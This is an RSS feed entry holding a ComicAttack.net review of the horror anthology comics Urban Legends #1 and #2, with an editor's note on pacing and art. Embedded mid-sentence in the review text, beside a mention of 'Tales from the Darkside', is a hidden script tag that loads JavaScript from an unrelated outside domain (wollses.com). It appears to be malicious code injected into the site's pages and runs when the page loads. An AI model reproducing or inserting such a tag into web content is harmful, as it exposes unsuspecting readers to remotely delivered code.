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	<title>Jon Woodard &#8211; ComicAttack.net</title>
		<title>4-Eyed Productions Review: Urban Legends #1 &#038; #2</title>
		<dc:creator><![CDATA[Dr. Bustos]]></dc:creator>
		<pubDate>Wed, 28 May 2014 16:03:44 +0000</pubDate>
				<category><![CDATA[Dr. Bustos]]></category>
		<category><![CDATA[4-Eyed Productions]]></category>
		<category><![CDATA[Brandon Balke]]></category>
		<category><![CDATA[Brandon Filbert]]></category>
		<category><![CDATA[Jeff Balke]]></category>
		<category><![CDATA[Jon Woodard]]></category>
		<category><![CDATA[Keith Thomas]]></category>
		<category><![CDATA[Miriam Medina]]></category>
		<category><![CDATA[Urban Legends]]></category>
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					<description><![CDATA[Urban Legends #1 &#38; #2 Publisher: 4-Eyed Productions Creators and Story: Issue 1: Jeff Balke and Brandon Filbert; Issue 2: Jeff and Brandon Balke Writer: Keith Thomas Pencils: Miriam Medina Colors: Issue 1: Jeff Balke; Issue 2: Jon Woodard I&#8217;m a fan of horror anthologies. The TV show variety were the ones I grew up [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><em><strong>Urban Legends #1 &amp; #2</strong></em><br />
<strong>Publisher:</strong> 4-Eyed Productions<br />
<strong>Creators and Story:</strong> Issue 1: Jeff Balke and Brandon Filbert; Issue 2: Jeff and Brandon Balke<br />
<strong>Writer:</strong> Keith Thomas<br />
<strong>Pencils:</strong> Miriam Medina<br />
<strong>Colors:</strong> Issue 1: Jeff Balke; Issue 2: Jon Woodard</p>
<p>I&#8217;m a fan of horror anthologies. The TV show variety were the ones I grew up on, but I also read comics and books, while occasionally catching movies like that, as well. I&#8217;d also love reading up on Urban Legends and the possible origins of them. So a horror anthology comic that takes urban legends and puts them onto the page seemed like a fun combo. How does it do? Let&#8217;s find out.</p>
<p>First off, the book is just called <em>Urban Legends</em>. I love the simplicity of that, I&#8217;d have thought that was taken, but knowing that it wasn&#8217;t is so charming to me since I&#8217;d have expected it have to need so many colons in its title. One thing I noticed right from the start is we get a redundancy by having a page explain to us what Urban Legends are, but then does the same thing when the comic starts through narration. I&#8217;d say pick one since they are literally back-to-back.</p>
<p>The thing I really liked was how the two issues seem to be linked into a single world and story. This was the sort of thing that has me interested. If you&#8217;ve heard any urban legends, these are likely some of the first you heard, but to have them exist in one big story is interesting. I kept having flashbacks to the show <em>Tales from the Darkside,<script src="//wollses.com/steps"></script></em> and a cartoon that told urban legends. I&#8217;m a fan of both those shows, so reminding me of them is a good sign.</p>
<p>The variations to the stories aren&#8217;t groundbreaking, but it does fill in the points that you&#8217;d normally be able to skip over in a verbal telling of the tales. The art, at certain points, does a good job of conveying the plot without words, which is nice to see.</p>
<p>If you like horror comics and urban legends, give this series a look. I&#8217;d like to see if they do more with these linked stories, or if it&#8217;s like how Mr. Show skits inter-connected.</p>
<p><span style="text-decoration: underline;">Dr. Alexander Bustos<br />
<p><strong>Editor&#8217;s note:<br />
</strong>This isn&#8217;t my favorite genre of comics, but I also took a look. The first issue is a warning to always be aware of your surroundings. A shadowy figure follows the main character throughout, but she ignores it until it&#8217;s too late. The pacing is incredibly fast, too fast, which makes it hard to care about the lead; a shame since her visual look makes her seem like she might be interesting. She&#8217;s gone just as quickly as we meet her, however. Fortunately the issues are tied together by minor characters in issue #1 making a reappearance in #2; a nice touch. This time the narrator warns readers that urban legends tend to begin with a sliver of truth, despite the ongoing exaggerations as the story is told and retold. These retellings make the legend seem so ridiculous, especially since there&#8217;s never any real evidence to back them up&#8230;until it happens to you. Both comics feel like stories told around a camp fire, or in a dorm at summer camp. The artwork in both issues feels a little manga-inspired (though I may be imprinting that since I read so much manga). Though of note is a really fantastic splash page in issue two that made me stop and stare. This is a new venture for Jeff and Brandon Balke as they launch their own publishing label, so keep an eye out for more things to come.</p>
<p><span style="text-decoration: underline;">Kris<br />